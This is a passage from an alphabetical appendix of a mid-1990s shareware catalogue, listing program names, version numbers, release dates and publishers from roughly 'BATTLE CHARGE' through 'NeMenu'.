1.1 (09-30-93) Robin R. Latham + BATTLE CHARGE 1.04 (10-07-95) Cold Water Software + BATUTIL 4.0 (12-23-91) CTRLALT Associates + BBS Communications 2.18 (05-05-95) MicroFox Company + BCM Menu System 2.2 (01-09-94) BCM Software + Beam Cookbook 1.00 (10-01-94) SoftEngineering + BESTHES 1.5 (08-01-94) LANGUAGE SOFTWARE Co. + Bible Timeline 2.14 (03-01-93) Cascoly Software + Bible Timeline for Windows 1.10 (08-10-95) Cascoly Software + BIBLOGIC 3.02 (12-19-93) Biblogic Computer Services + Bigsort 1.02 (10-01-93) MeadowBrook Industries, Ltd. + Bike 4.0 (10-01-95) Henning Associates + + Appendix E, "Sorted list of all programs" 767 + + + + Bingo Text Editor 4.00a (10-26-94) Sunderland Software + BitMapZ For Windows 2.30 (01-20-95) Unicorn Software Limited + BlackJack! 2.50d (08-21-94) Glencoe Computing + BLANK-IT 5.1b (10-11-92) Rhode Island Soft Systems, Inc. + BLANK-IT API Specifications 5.1b (10-29-92) Rhode Island Soft + Systems, Inc. + BmpLst VBX 1.8 (08-14-94) Mabry Software + The Book Collector (New & Rare) 1.5 (10-29-93) Fischer Grafix + & Software + Book Librarian 1.53 (12-26-93) TurboSystemsCo + Book-It 1.0a (04-25-95) Instinctive Systems Ltd + Bookbild/DOS Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + Bookbild/Win Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + BOOKLET 4.5 (10-02-94) Sympathetic Software + BOOT.SYS 2.10 (10-26-94) Salvisberg Software & Consulting + Bootit 1.02 (09-03-95) TeraByte Unlimited + Border 1.1 (02-23-89) Cascoly Software + Bottom Line Accounting 2.5E (02-04-94) WindSoft International, + Inc. + BOXER/DOS Text Editor 7.0a (06-16-95) Boxer Software + BOXER/OS2 Text Editor 7.0a (06-16-95) Boxer Software + Brandon's Big Lunchbox 1.75 (09-17-93) Robichaux and + Associates + Brandon's Preschool Graphics Lu 1.0 (01-01-94) Robichaux and + Associates + Bridge Assistant 3.0 (10-01-95) SoftTech + Brother's Keeper 5.1 (02-01-93) John Steed + Btr Help! 1.88 (06-15-91) Informative Technologies + Btr Watch 1.0 (09-15-91) Informative Technologies + BTS-Equalizer 1.9 (02-24-94) Nine-Patch Software + Bubble Chart 2.0 (06-15-95) Informatik Inc. + BUDDY: A Tutorial Companion 1.2 (08-05-92) Chatfield Software, + Inc. + Builder 2.2 (10-27-94) Aeolus Software + Business Cards for Word 6.0 2.0 (05-02-95) AMF + Business Clock Link 1.00 (12-06-94) BizMark Development + BusinessCards for Windows v2.01 (05-10-94) Michael Dvorkin + Button Manager for Windows 1.3b (01-10-95) AKC Applied + Knowledge Corporation + By the Numbers 5.4a (07-28-95) R.K. West Consulting + C xref 3.0a (11-01-93) DA Software + C-Menu/32 5.00 (08-06-94) C-Vision + c-scope 1.11 (10-31-93) JAYAR Systems + Calculation Solitaire 1.12 (12-23-91) Daniel Thomas + CALC_JNC 9.51 (02-20-93) James N. Cox + Calling Cards 3.3 (09-05-95) My Little Realm Enterprises + THE CALLING TREE 1.7a (08-31-94) IN/QUEST, LLC + Canfield for Windows 1.01 (01-04-92) Daniel Thomas + Capbuf 1.41 (12-28-90) Cascoly Software + Capital Gainz 4.0 (06-01-95) AlleyCat Software, Inc. + Car Restoration Diary 2.31 (01-27-94) RMH Computer Services + Card Flash 1.0 (11-21-94) Burnham Park Software, Inc. + + Appendix E, "Sorted list of all programs" 768 + + + + Cards+More 2.1 (09-01-95) Informatik Inc. + CashMaster 1.51 (03-05-95) Contractor Information Systems, + Inc. + CassetteMaster 9.10 (09-01-94) Unicorn Software Limited + CassetteMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + CATALOG-ON-A-DISK 4.00 (05-01-94) EmmaSoft Software Company, + Inc. + CD Player for Word 6.0 1 (05-02-95) AMF + CD-Box 3.03B (08-11-93) Jeffrey Belt + CD-QUICK Cache 1.20 (06-12-95) Circuit Systems + CD-ROM Guide 1.1 (02-04-94) Save the Planet Software + CDMaster 8.60 (09-01-94) Unicorn Software Limited + CDMaster For Windows 3.10 (01-29-95) Unicorn Software Limited + CDPlayer for Windows and DOS 3.4 (10-31-93) Jupiter Software + Charging 3.3 (09-05-95) My Little Realm Enterprises + Checking 3.3 (09-05-95) My Little Realm Enterprises + Chicago-Like Windows Titlers 1 (05-02-95) AMF + Chores & Rewards 1.00 (01-01-95) K. Jeff Hayes + Chris's Automobile Recorder 13.2 (01-08-94) Cooney Applied + Technology + ChronoLog 1.11 (09-15-93) ComputerEase + CHRONOS 2.18 (01-10-93) Cascoly Software + CHRONOS:Windows in Time 1.10 (09-01-95) Cascoly Software + Cipher 2.2 (09-01-94) Arcanum Computing + Cipher for Windows 1.1 (09-01-94) Arcanum Computing + CircumSpace 1.0 (09-06-93) KlassM Software, Inc. + Citizen 4.0 (05-13-95) R.K. West Consulting + CJNFonts 1.00 (11-19-94) Christopher J. Noyes Software + Cliche Finder 2.0 (05-10-95) R.K. West Consulting + Clickometer 1.1 (11-29-94) Sapphire Software Inc. + ClipMate for Windows 3.13 (09-01-95) Thornton Software + Solutions + clySmic Icon Bar 2.20 (03-01-95) clySmic Software + clySmic Lunar Almanack 2.00 (01-24-95) clySmic Software + CMFiler 5.37d (07-15-95) NoVaSoft + CMTS (Church Mbr. Tracking Sys) 3.3 (10-01-93) Torbert Data + Systems, Inc. + CODE-A-LINE 1.0 (03-22-94) Optimax Corporation + Code.Print for Visual Basic 2.23 (06-19-95) Caladonia Systems, + inc. + COLOR CROSS 1.05 (10-07-95) Cold Water Software + Color Fun 1.0 (05-06-94) Burnham Park Software, Inc. + Colored Toolbar Icons for Word 2.0 (05-02-95) AMF + COM-AND 2.93 (11-17-93) CABER Software + ComeBack 3.0 (01-06-94) MicroTools Inc + CommEx 1.12 (09-25-95) Cottonwood Software + COMpanion 1.2 (08-01-94) Oxford House Software + The Complete Image 3.11 (07-01-93) Hot Wax Software + The Complete Morph 2.10 (02-26-94) Hot Wax Software + Computer Dictionary 1.20 (12-29-94) Gary FitzGerald + Computer System Manager 1.41 (02-19-94) RMH Computer Services + Computerized Christmas Cards 1.3 (10-01-95) Impact D. + Publishing + + Appendix E, "Sorted list of all programs" 769 + + + + Computerized Valentine Cards 1.1 (10-01-95) Impact D. + Publishing + Contact Browser 2.5b (08-25-95) Moore Software Solutions + Contact Manager 2.21 (10-12-94) CPI computer services + Contact-Lens! 2.3 (04-15-94) Kruse Control Software + Content Label Rating 1.0 (10-08-94) R.K. West Consulting + CONTRACT BRIDGE 2.1 (08-15-95) Robert Lindsay Wells + Convert It!(tm) SE 3.0b (03-17-95) SMI Corporation + CrabWise 1.0 (01-01-94) Shawn Anderson SoftWare + Creativity Package 4.0a (07-29-95) R.K. West Consulting + CRISP-R REAL ESTATE ACCOUNTING 2.10 (07-01-95) JAMES W. + FUNSTEN SOFTWARE + Crossdown 2.8 (05-13-93) CROSSDOWN + Crossdown for Windows 1.1 (02-07-95) CROSSDOWN + Crossword Clipper for DOS 2.00 (04-15-94) PC HELP-LINE + Crossword Clipper for Windows 2.00 (04-15-94) PC HELP-LINE + Crossword Creator 6.00 (04-15-94) PC HELP-LINE + CrossWords 1.42 (04-08-95) Glen DeBiasa + Crowndale Tales : ESCAPE! 1.0 (08-17-95) Crowndale Productions + Crush v1.3 (11-05-94) PocketWare + Cryptik 1.4 (10-02-93) Cascoly Software + Crypto! 2.0 (03-01-94) KMR Consulting + Crystal Ball 4.0 (05-12-95) R.K. West Consulting + CS/AMORT 2.10 (10-08-94) Computer Solutions, Inc. + CTS Serial Port Utilities 1.2 (12-06-93) Computer + Telecommunication Systems, Inc. + CULTURAL AWARENESS 1.13 (05-04-94) Awareness Productions + Cumberland Diary 1.3 (01-01-94) Cumberland Family Software + Cumberland Family Tree 3.5 (01-01-94) Cumberland Family + Software + Cumberland Story 1.2 (01-01-94) Cumberland Family Software + Curses! 3.1 (05-17-95) R.K. West Consulting + CUSTOM SCREEN SAVER (WINDOWS) 1.0 (01-15-94) Accidental + Software + CzarInstall for DOS 1.02 (04-20-95) CZAR Software + CzarList for VBDOS 1.10 (10-29-94) CZAR Software + D86 Debugger 3.22 (01-20-90) Eric Isaacson Software + DaMenu 2.01 (06-04-94) Just-In-Time Computing Services + DARN! Don't Forget! 4.00 (05-31-95) EmmaSoft Software Company, + Inc. + DasBOOT! 3.0 (10-01-94) WHEEL Games + DATA MASTER 3.1 (11-24-93) RKS Software, Inc. + DATA PROTECTOR 2.00 (02-01-95) PIGAS INC. + Data Wire Four 1.4.1 (07-20-95) C & R Business Systems Ltd. + DATABASE BROWSER 1.21 (04-15-95) Redei Enterprises + Dave Dude 2.1 (05-14-95) APG + A Day at the Races 1.1 (10-26-94) LatticeWork Software + Day By Day 1.3 (05-05-95) Q&D Software Development + DayMaster 4.10 (09-01-94) Unicorn Software Limited + DAYO ACCOUNTS PAYABLE (AP) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO ACCOUNTS RECEIVABLE (AR) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO BACK ORDERS (BO) 4.50+ (02-01-94) TJS LAB, Inc. + DAYO BAR CODE 3 OF 9 4.55+ (03-01-94) TJS LAB, Inc. + DAYO BILLING & INVOICING 4.61+ (03-01-94) TJS LAB, Inc. + + Appendix E, "Sorted list of all programs" 770 + + + + DAYO END OF PERIOD 4.50+ (02-01-94) TJS LAB, Inc. + DAYO GENERAL LEDGER (GL) 4.60+ (03-01-94) TJS LAB, Inc. + DAYO INDEX 4.50+ (02-01-94) TJS LAB, Inc. + DAYO INVENTORY 4.56+ (03-01-94) TJS LAB, Inc. + DAYO LITTLE POS 4.62+ (03-15-94) TJS LAB, Inc. + DAYO MEMBERSHIP 4.40+ (01-01-94) TJS LAB, Inc. + DAYO MENU 4.14+ (12-01-93) TJS LAB, Inc. + DAYO MRP 4.61+ (03-15-94) TJS LAB, Inc. + DAYO ORDER ENTRY 4.60+ (03-01-94) TJS LAB, Inc. + DAYO PASSWORDS 4.50+ (01-01-94) TJS LAB, Inc. + DAYO PAYROLL 4.61+ (03-01-94) TJS LAB, Inc. + DAYO POS (POINT OF SALE) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO PRICE BOOK 4.50+ (12-01-93) TJS LAB, Inc. + DAYO QUOTES 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RENTAL POS 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RETURN MANAGEMENT SYSTEM 4.00+ (12-01-94) TJS LAB, Inc. + DAYO SALES MANAGEMENT SYSTEM 4.42+ (02-01-94) TJS LAB, Inc. + DAYO SERVICE DISPATCH 3.20+ (03-01-94) TJS LAB, Inc. + DAYO SIMPLE POS 4.61+ (01-01-94) TJS LAB, Inc. + DAYO SMART REPORTS 4.51+ (12-01-93) TJS LAB, Inc. + DAYO TIME & BILLING 4.50+ (12-01-93) TJS LAB, Inc. + DAZZLE 5.1b (03-19-95) Worldwide MicroTronics, Inc. + DBKIT 2.5 (03-01-94) P. C. Softsmith + DDE Requester for Win3.x & NT 1.01.00 (03-31-94) Westerdale AG + DDKEY 2.02 (12-12-93) David M. Dibble + Dear Diary 3.0 (06-22-95) Q&D Software Development + Declaration of War 1.1 (08-15-94) Burnham Park Software, Inc. + The Deer Expert 4.2 (05-01-94) Strat-Tech, Inc. + The DemoMaker 1.55 (04-02-94) Ron Janorkar + DeskTop Advisor(R) 2.0 (12-04-93) Ivden Technologies, Inc. + DEXTER Text Editor 2.00 (01-16-95) FAGERLUND CONSULTING + DFInfo VBX 2.1 (08-14-94) Mabry Software + Diamond Data 4.6 (07-30-94) The Software Construction Co. + DIFF 1.21 (10-15-94) C.Sitte Softwaretechnik + Disk Drive Cleaner 1.0 (10-24-93) Rosenthal Engineering + Disk Piecharter 1.1 (03-08-95) Zorn Software + DISK SPOOL II 5.04 (12-29-94) Budget Software Company + DISKLIST 3.06 (01-25-94) Gulf Sierra + DiskMan for Windows 2.1 (04-01-93) Diskmaster Software + DizView 2.0 (06-09-95) Lincoln Beach Software + DJ-CHECK 2.01 (04-29-93) JMJ Software + DJ-LOPE 4.01 (03-27-93) JMJ Software + DJ-SLEEVE 2.0 (01-19-93) JMJ Software + dMAIL4 4.0.1 (07-20-95) C & R Business Systems Ltd. + DMPLAS (Dot Matrix to LaserJet) 1.1 (11-15-91) Software Co-op + DO 4.3 (01-01-95) RobiNets + DOC DEFIANT 1.0 (02-01-94) Just For Me Software, Inc. + DOS Menu 2.20 (05-05-95) MicroFox Company + DOS Summary 1.01 (02-23-91) Computer Knowledge + DOS Summary (Hypertext) 2.0 (02-15-92) Computer Knowledge + Double Directory 1.40 (06-01-93) 100% Cotton Software + dPerfect Merge 2.0 (05-16-95) Newdorf Research + DR. FORM 3.1 (03-01-94) IrwinWare + DR. Memory 3.3 (01-09-94) Cooney Applied Technology + + Appendix E, "Sorted list of all programs" 771 + + + + DRAFT CHOICE 2.00e (01-06-94) TRIUS, Inc. + Drag 'n' Drop Utils for Win NT 1.42 (09-26-94) clySmic + Software + Drag and Drop Printing v2.0 (02-01-94) FLFSoft Inc. + Drag And View 2.0 (07-12-93) Canyon Software + Drag And Zip 2.41 (06-22-93) Canyon Software + Dragons Bane: Mah Jongg II 1.0 (06-01-95) Arcanum Computing + DRIVEMAP 1.2 (08-01-94) Oxford House Software + DRIV_MAN 1.30 (10-31-94) MicroMetric + dVERSION 2.0 (09-05-93) C & R Business Systems Ltd. + DXF Bill of Materials Generator DOS1.00 (03-01-95) Annabec + Business Services + E-report 2.0 (06-15-95) Informatik Inc. + Early Bird 1.0f (03-01-95) Burnham Park Software, Inc. + Easy Backup 4.5 (06-15-95) Easy Software + Easy Base 9.0 (06-10-95) Easy Software + Easy Install 4.4 (06-15-95) Easy Software + Easy Menu 6.4 (06-16-95) Easy Software + Easy Word 9.2 (06-16-95) Easy Software + Easydial 4.5 (01-22-93) Patri-Soft + Ecomaster 1.01 (09-01-95) Cascoly Software + Econ's Arena 1.04 (05-18-95) Glen DeBiasa + EDDY (EDit DirectorY) 8a (10-16-95) John Scofield + Edens-for-two 4.3 (03-18-94) Martlet, Inc. + EDGEFLOW 5.0 (02-24-93) Pacestar Software + EDITEUR V2.3 (10-01-95) Jean-Pierre Menicucci + EGA Mouse Paint 5.0 (10-29-93) Fischer Grafix & Software + EGATrek 3.1 (09-01-94) Arcanum Computing + EGAWHEEL V.1.91 (12-18-93) WHEEL Games + Elbow Grease for Windows v1.0 1.0 (05-02-95) AMF + Electronic Postal Window(tm) 1.6 (07-09-95) EmmaSoft Software + Company, Inc. + The Electronic Square 1.03 (06-19-95) Electronic Creativity + Products + ELFTREE 3.01S (12-28-93) Elvish Consulting + EMERI 1.3 (05-01-93) Rhode Island Soft Systems, Inc. + EMS4C Library 1.0 (10-18-93) MarshallSoft Computing, Inc. + Enigmacross 1.5 (06-12-93) CROSSDOWN + ENTER-EASE 1.1 (09-29-94) KAYL SOFTWARE + EnVision Publisher 1.0 (09-01-92) Software Vision Corporation + ENVI_MAN 1.10 (01-01-94) MicroMetric + Equatron 2.10 (07-08-95) Glen DeBiasa + ES-NEWS 2.29 (05-01-95) Extensions Software Corporation + ES-NMB 1.25 (05-01-95) Extensions Software Corporation + ESPTEST 1.0 (05-26-92) Selfhelp Software + Examine 1.12 (08-08-94) Aquila Software + ExamineZip 1.01 (08-08-94) Aquila Software + Exile: Escape From the Pit 1.0.3 (09-08-95) Spiderweb Software + Exile: Escape From the Pit 1.2 (09-08-95) Spiderweb Software + Exit Master for Word 6.0 1.0 (05-02-95) AMF + EXPRESSCALC 4.10 (05-02-92) Expressware Corporation + EXPRESSCHECK 4.04 (11-18-93) Expressware Corporation + EXPRESSGRAPH 1.05 (05-01-92) Expressware Corporation + EXTENDED BATCH LANGUAGE-PLUS! 4.08 (04-12-93) Seaware Corp. + + Appendix E, "Sorted list of all programs" 772 + + + + Extract It 1.00 (07-14-95) TeraByte Unlimited + EZ-Tree 2.30 (05-05-95) MicroFox Company + EZinst 1.2 (07-28-94) Burnham Park Software, Inc. + EZSET 2.1 (12-05-93) McAdams Associates + Family Calendar for Windows 1.30 (04-18-95) Command Line + Software + FastBreak Fantasy Basketball 3.08 (02-18-94) McS Custom + Software + FAXHAVEN 1.0 (10-01-94) HTF Consulting + FBScheduler 1.00 (10-20-95) Forrest D. Bruner + FDplot 1.3 (07-12-92) Abri Technologies, Inc. + THE FEELING'S MUTUAL-DOS 3.1.93 (04-01-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-Macintosh 3.1.93 (04-15-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-WINDOWS 3.1.93 (04-01-94) Interpretive + Software Inc. + FF Business Cards 1.0 (12-08-94) M & R Technologies, Inc. + FF Designer Envelopes 1.2 (12-01-94) M & R Technologies, Inc. + FF Graphics Conversion Utility 1.1 (12-20-94) M & R + Technologies, Inc. + Fictionary 1.32 (04-30-90) Cascoly Software + FILE EXPRESS 5.1 (12-10-93) Expressware Corporation + File Finder for Windows 3.0 (08-22-94) Simian Id Software + File Finder/Grouper 2.02 (04-16-95) EnGamma + File Manager Jr. 1.2 (12-07-94) Charles R. Maher + File Maven 3.0 (03-14-95) Kent Briggs + FileFinder 4.4 (09-20-93) California Software Design + FileMod 1.2 (06-17-95) Lincoln Beach Software + FileSafe 1.02 (05-15-94) JAYAR Systems + FILE_HANDLE File Management 1.11 (08-20-95) Hasoft + FILE_MAN 4.30 (01-01-94) MicroMetric + Financial Analysis For Windows 4.0 (08-01-95) Gjetaas, Inc. + Financial Freedom 2.0 (02-01-94) M & R Technologies, Inc. + Financial Freedom Billing Mgr. 2.3 (12-15-94) M & R + Technologies, Inc. + Financial Freedom GOLD 1.0 (03-30-94) M & R Technologies, Inc. + Finders Keepers 1.01 (04-08-95) Glen DeBiasa + First Impression 3.1 (06-09-95) Lincoln Beach Software + The Fish Expert 3.2 (05-01-94) Strat-Tech, Inc. + Fishtime 3.5 (09-12-95) C & E Associates + Fixed Asset Pro 2.1 (07-15-95) HammerSoft, Inc. + Flexitime/Time Logging 5.32 (06-01-95) HJS Systems + FlowDraw Plus 1.00 (03-20-95) + Flu_Shot+ 1.83 (07-11-93) Software Concepts Design + FMDrop VBX 1.1 (08-14-94) Mabry Software + Folders 2.0 (03-22-95) Target Software + FONEFILE 5.0a (10-01-93) Business Enhancement Partnership + Group + FontBook Professional 2.7 (06-13-94) The C Group, Inc. + Fonter 6.2 (04-15-94) OsoSoft + FontMe! 2.5 (10-29-93) Fischer Grafix & Software + Fonts Ink Fonts 1 (01-04-93) Software Co-op + FootPrint 1.4 (11-16-93) SUPERWARE + + Appendix E, "Sorted list of all programs" 773 + + + + Form Editor (FED) 1.13 (05-05-95) MicroFox Company + Fortune Teller 4.4 (10-02-94) R.K. West Consulting + FPLAN-KWIK Financial&Retire Pln 1.0 (06-14-94) First Financial + Software + Free System Resources 1.0 (12-29-94) Chet Williams + FreeForm 2.3 (11-01-94) Herne Data Systems Ltd + French Dictionary for Word 6.0 1.0 (05-02-95) AMF + Frenetic Screensaver 3.3 (06-01-95) Seraline Pty Ltd + From Scratch recipe processor 3.04 (11-01-94) Desktop + Solutions + FSave 1.1 (03-15-95) KMR Consulting + FSLOGIN 2.01 (07-01-95) Confirm + FundRaiser Basic 1.32 (03-08-95) Professional Support Software + GAKUSEI 1.1.3 (06-12-94) Barham Software + GammaCAD PRO 2.00 (07-10-95) Gamma Software + GARDENING BUSINESS 1.1 (03-25-95) Redei Enterprises + GEMCAP 4.02 (03-07-93) Natural Software + Geomancy 4.7 (05-19-95) R.K. West Consulting + GetBack 2.4 (12-24-92) MicroTools Inc + Golf Tournament Scorekeeper 1.2 (07-04-94) Home Alone Software + Golfhcap 5.5 (09-12-95) C & E Associates + GradeBook for Windows 3.06 (01-24-95) R&R EdWare + Grafer Line Graphs for Reports 2.1 (04-15-95) Lovell's + Grammar Expert 1.02 (02-15-93) Wintertree Software Inc. + Graphcat/DOS Clip Art Cataloger 3.1 (06-20-94) Science + Translations Software Services + Graphcat/Win Clip Art Cataloger 3.2 (02-01-95) Science + Translations Software Services + GREEN 1.11 (05-10-93) Cascoly Software + GridForm 1.0 (12-15-91) Software Co-op + Grocery Manager for Windows 2.31 (11-05-94) Absolute Value + Software + Grow'Em 3.0 (03-01-95) Paul Postuma + Hands On Remote Control/Access 5.5 (08-29-95) P. C. Softsmith + HandyDOS 1.6 (10-22-92) Abri Technologies, Inc. + Hang Man 1.1 (08-16-94) Burnham Park Software, Inc. + HANG4.ZIP 4.1 (12-08-93) Larry W Parker + HangWin 2.04 (07-15-95) Temprano Software + Hard Disk Director 5.2 (03-15-92) Canyon Software + Hard Wire Four 2.8.1 (07-20-95) C & R Business Systems Ltd. + Have You Read That Movie? 1.0 (04-01-91) 100% Cotton Software + HDM - Hard Disk Menu 5.01 (05-05-95) MicroFox Company + Heart Smart 2.0 (04-25-95) Henning Associates + Hebrew Edit 1.2b (02-14-94) Right to Left Software + HELLLP! 1.0c (11-20-93) Guy Software + Helpgen 1.20 (09-06-94) Rimrock Software + HiMOVE 2.20 (05-12-93) C.Sitte Softwaretechnik + HiVIDEO 2.03 (05-08-93) C.Sitte Softwaretechnik + HOLD-ANYTHING! 1.1 (02-21-93) Elk Creek Software + Home Plan 2.7 (11-01-94) Home Plan + Home Refinancing 1.2 (03-21-94) ProDomus, Inc. + HOME/OFFICE INVENTORY 1.0 (03-28-94) ProDomus, Inc. + HortMan 1.0 (11-10-93) Sunrise Software + Household Register 3.12 (12-27-93) TurboSystemsCo + + Appendix E, "Sorted list of all programs" 774 + + + + HouseHold TRACKER 1.6 (10-29-93) Fischer Grafix & Software + How to join as a "beta" author n/a (11-27-89) Association of + Shareware Professionals + HQ-FAX (1-Step High Quality FAX 2.0 (09-30-94) HTF Consulting + Hubble 2.21 (06-15-95) Hubble Software Company + I Ching Empower Tool 1.0 (05-02-95) Empower Tools + I&M USA 1.05 (05-05-94) C T Johnson, Inc + IBM PC Author Application n/a (11-14-92) Association of + Shareware Professionals + ICP 11 (02-01-94) Spirit7 Software, Ltd. + Image'n'Bits 1.0 (11-24-93) Bananas Software Inc + INFOMANIA 2.1 (05-10-95) Brian Sutton + Information about copyrights n/a (04-29-90) Association of + Shareware Professionals + Infothek (Docuthek) 1.10 (08-10-95) Informatik Inc. + Infothek Information Manager 1.10 (08-10-95) Informatik Inc. + IniCon VBX 3.1 (08-14-94) Mabry Software + Inspect & Install for Windows 1.10 (02-26-94) M2w Software + INSTINDX 1.0 (09-01-94) C T Johnson, Inc + INSTSPEC 1.0 (05-05-93) C T Johnson, Inc + Integrity Master(tm) 2.11a (11-04-93) Stiller Research + INVENTORY & COST CONTROL 4.2 (01-15-94) First Step Software + Inventory Interface 7.25 (04-01-95) Data Interface + J-Works 2.2 (03-01-95) MicroWorks Inc. + J.T.S. TIME SHEETS 1 (09-20-94) Easy Software + JailBird 2.50 (03-25-95) RMH Computer Services + Jasc Media Center 2.02 (07-13-95) JASC, Inc. + Jason's File Finder 2.0d (09-03-93) RMH Computer Services + JobLog Project Timekeeper 2.0 (05-08-95) Brian Sutton + Jokes & Quotes 1.4 (02-12-94) Michael L. Wester + JoyStk VBX 1.2 (08-14-94) Mabry Software + JRchive 1.02 (11-01-93) JAYAR Systems + JRE Home Inventory 6.3 (09-30-94) JRE Enterprises + Judy's TenKey 3.0 (10-20-94) Judy's Applications + KAPIAN : Chinese Flash Cards 1.1 (02-02-92) Selfhelp Software + Katelin Comment Manager 1.20 (09-26-94) Katelin, Inc. + Keyboard Coach Fantasy Football 1.03 (01-08-94) McS Custom + Software + Keyed File System (DOS) 2.12 (05-16-94) APT Computer + Solutions, Inc. + Keyed File System (OS/2) 2.12 (04-11-94) APT Computer + Solutions, Inc. + Kid's Art 1.1 (09-20-94) R.K. West Consulting + Kidproof for Windows 1.0 (08-16-95) Applied Softworks Inc. + Kith and Kin 3.0 (09-04-95) SpanSoft + LABEL MASTER 5.1c (11-24-93) RKS Software, Inc. + LAN Menu 2.05 (05-05-95) MicroFox Company + Landscape Explorer 3.01 (01-01-95) WoolleySoft + LAPC - Loan Advisor for the PC 2.3 (04-01-94) J.D. Consulting + Associates + LASR_MAN 6.05 (10-31-94) MicroMetric + The Lawyer's DeskTop 2.1 (07-25-94) DataPro Enterprises, Inc. + Layout 3.1 (03-25-92) Software Co-op + + Appendix E, "Sorted list of all programs" 775 + + + + LEADING AND MANAGING OTHERS 1.0 (09-19-94) Chatfield Software, + Inc. + League Manager 1.90 (04-16-94) Al Dodd Software Co. + LEANER 2.20 (11-22-93) MoonStone Software + Lecture 1.02 (12-14-92) Barn Owl Software + LegRoom 3.0 (02-06-95) Ivden Technologies, Inc. + LessonPlanZ 2.60 (09-01-94) Unicorn Software Limited + The Letterhead Kit/DOS 3.0 (06-28-93) Science Translations + Software Services + The Letterhead Kit/Win 3.0 (02-25-95) Science Translations + Software Services + The Lights Go Down 2.20 (07-07-95) Thomas Hoevel Software- + Development + LineDrive Fantasy Baseball 6.13 (02-18-94) McS Custom Software + LinguaPro/SPANISH 2.50 (09-06-94) Schulenberg and Associates, + Inc. + Link 2.1 (05-01-95) Target Software + ListBuilder 1.1 (06-27-95) Younkin Enterprises + Little Black Book 3.0 (10-25-94) Q&D Software Development + Little Lists 3.2 (07-28-95) R.K. West Consulting + LJ-SLEEVE 2.0 (06-11-92) JMJ Software + Loan Master 1.52.14 (10-01-94) Bottom Line Software, Inc. + Local Access Logon 2.12 (10-12-94) M2w Software + Lotto Challenger 3.8 (05-01-94) Data Solutions + LOTTO MANIA 2.01 (01-01-95) Robert O. Leafloor + Lotto Prophet 5.0 (01-05-95) DataMicro, Inc. + Lotto Thunder (PICK-6 Version) 1.4 (05-01-95) Charles P.Staats + LPRINT 2.1 (02-22-94) Paragon Innovations, Inc. + LQ 2.35 (10-01-90) Granny's Old-Fashioned Software + LZW Data Compr. Lib for Windows 1.0 (07-12-94) MarshallSoft + Computing, Inc. + LZW Data Compression for C 1.4 (06-01-94) MarshallSoft + Computing, Inc. + LZW Data Compression for Pascal 1.4 (06-01-94) MarshallSoft + Computing, Inc. + MacIntosh Author Application n/a (09-03-92) Association of + Shareware Professionals + THE MAGIC OF THE MIND 1.0 (10-13-93) Donald E.J. Field + MAGIC SQUARES 1.0.3 (09-14-93) Randy A. Harris + Mah Jongg-Solitaire 4.2 (09-01-94) Arcanum Computing + Managing Your Food 4.51 (01-01-94) MYF Software + MapDraw 2.0 (07-25-95) Informatik Inc. + MAPIT 1.4 (04-15-94) Allison Software + Marnav 4.5 (09-12-95) C & E Associates + Mass-Store Copy 2.6 (04-01-91) Informative Technologies + Master Disk 2.0 (10-24-93) Rosenthal Engineering + Math Bingo 1.1 (10-26-94) LatticeWork Software + MATH CHALLENGE 2.0 (03-01-94) Just For Me Software, Inc. + MathCounts 1+2 1.2 (01-07-94) Able Art Software + MathCounts 3+4 1.2 (01-07-94) Able Art Software + MathWiz 2.0 (06-15-95) Informatik Inc. + MAXI Form 1.8 (12-01-93) Herne Data Systems Ltd + Mayan Calendar 3.8a (12-27-94) R.K. West Consulting + MAZE3 3.0.6 (01-19-89) Stiller Research + + Appendix E, "Sorted list of all programs" 776 + + + + MAZEMAKER for Windows 2.01 (03-01-93) Custom Real-Time + Software, Inc. (CRTS) + MCBase 2.0 (08-06-95) Harry Doldersum + Me & My Metabolism 1.20 (12-12-93) MoonStone Software + Medieval War 1.5 (02-16-95) Burnham Park Software, Inc. + Medieval War Door 1.0 (02-21-95) Burnham Park Software, Inc. + MEG SYSTEM INFO GRAPHS PIE 3-D 3.5 (07-30-94) Jim Tolliver + MEGA EDIT Editor for Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + MegaBack Hard Disk Backup 2.3 (04-27-93) Patri-Soft + MegaCad 1.0 (10-13-95) Midnight Software, Inc. + MegaWord 6.01 (04-26-94) Merlot International + MEGIK 1.1 (09-20-94) Advanced Topics + Melissa's Music Flashcards 3.1 (10-28-93) Fischer Grafix & + Software + MenuEv VBX 3.1 (08-14-94) Mabry Software + MENU_MAN 2.00 (01-01-94) MicroMetric + MERIT BADGE TRACKER 4.0 (06-02-95) Robert Barrentine + Consulting + MERLIN'S MATH 1.03 (05-04-94) Awareness Productions + METRIC-X 2.03 (09-01-93) Orion Development Corporation + MicroCook 1.81 (06-23-95) NORSKi Software + MicroFox DOS Utilities 1.14 (05-05-95) MicroFox Company + MicroPlayerCD(tm) 1.03 (02-26-94) Daniel Thomas + Minefield For Everybody 1.1 (06-01-94) Judah Warshaw + Money Organizer 2.0 (04-11-95) Redei Enterprises + MotelMAX 2.10 (05-01-94) MKM Software + Mouse Clock (tm) for Windows 2.0 (08-08-95) AMF + Mouse Math 1.0 (08-15-95) Hufnagel Software + MouseTools 1.0 (09-13-89) Arcanum Computing + MOZART (Virtuoso Edition) 1.3 (01-03-95) David Webber + MS Mega Pack (VBXes) 1.0 (08-14-94) Mabry Software + MSlot VBX 1.0 (08-14-94) Mabry Software + MultiLabel 3.5 (04-01-94) OsoSoft + MultiVu 1.1 (03-17-95) Ivden Technologies, Inc. + Music Sculptor for Windows 1.4 (03-07-94) Aleph Omega Software + Musical Instrument Tuner 1.01 (02-23-94) SoundByte Software + A MUSICAL TUTORIAL 1.1 (06-01-95) R. Swerdfeger + A MUSICAL TUTORIAL for Windows 1.2 (06-01-95) R. Swerdfeger + MusicEase 4.2 (09-10-85) RMH Computer Services + My Life 2.2 (09-30-94) JRE Enterprises + Mystic Pixels 1.1 (06-06-94) Tesuji Technology + NAMEBASE 3.2 (02-26-93) Elk Creek Software + National INNdex 5.05 (05-01-95) Nelson's Computer Services + NeMenu 1.01 